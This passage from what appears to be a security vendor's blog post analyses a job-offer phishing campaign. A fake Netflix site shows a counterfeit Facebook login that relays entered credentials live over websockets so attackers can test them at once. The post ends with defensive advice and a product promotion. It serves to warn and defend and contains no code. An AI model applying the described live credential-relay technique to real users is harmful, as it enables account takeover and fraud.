At this stage, all red flags should go up. It doesn’t matter if you choose “Continue with Facebook” or whether you enter your email and click “Continue with Email” the next screen will ask you to sign in to your Facebook account.

The only difference is that the second option fills out your email in the login screen.

That doesn’t make a lot of sense—Facebook is not known to keep track of your calendar. It does keep track of a lot of things, but your meeting schedule isn’t one of them. Besides, if you look at the address bar, you’ll see I’m still at the fake Netflix site.

However, it’s very normal practice to offer the option of logging in with Facebook on third party sites, so it would be understandable for the jobseeker to click that link.

When you enter the credentials and click on “Log In”, it will take a while and then you’ll be notified that “The password you’ve entered is incorrect. Please try again!”

This login page is also the part that makes this attack a very sophisticated one. The phishers use a websocket method that allows them to intercept submissions live as they are entered. This allows them to try the credentials and if your password works, they can log into your real Facebook account within seconds. They could potentially ask for multi-factor authentication (MFA) confirmation if that’s necessary, too.

Imagine that the phisher can instantly see the credentials you submitted, tests them at the real Facebook login page, and subsequently sends you the appropriate response. (In my case “wrong password” since I had no intention of feeding them valid credentials.)

You’d have no idea that they were accessing your Facebook account and they’d have bought some time to log you out, spam your friends, or whatever else they wanted to do with your account.

We often see phishing campaigns like these that are explicitly designed to steal the credentials of marketing managers, social media staff, and especially those who have access to company Facebook Pages or business accounts.

Compromising a business account can allow attackers to run malicious ads using the company’s payment methods, demand a ransom for return of control over the account, or use the company’s reputation to spread more scams.

**What to do**

If you suspect your credentials may have been compromised, immediately change your passwords, enable multi-factor authentication, and notify your IT/security team if you have one.

You can stay safe from these attacks by:

*   Be super cautious at engaging in job offers that you have not applied for.
*   Carefully check the URLs, both in the email and on the website, before you click them (did you notice the missing “i” in the domain name?)
*   Check if the address in the browser bar matches what you expect to see, along with the content of the website.
*   Learn how to spot and recognize phishing attempts. Phishing mails are getting harder to identify now that cybercriminals are using Artificial Intelligence (AI).
*   Keep your browser, your Operating System, and other software up to date.
*   Use an up-to-date real-time anti-malware solution with web protection.

Since the phishing campaign was hosted behind Cloudflare’s services, we have notified Netflix and Cloudflare about this campaign.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#web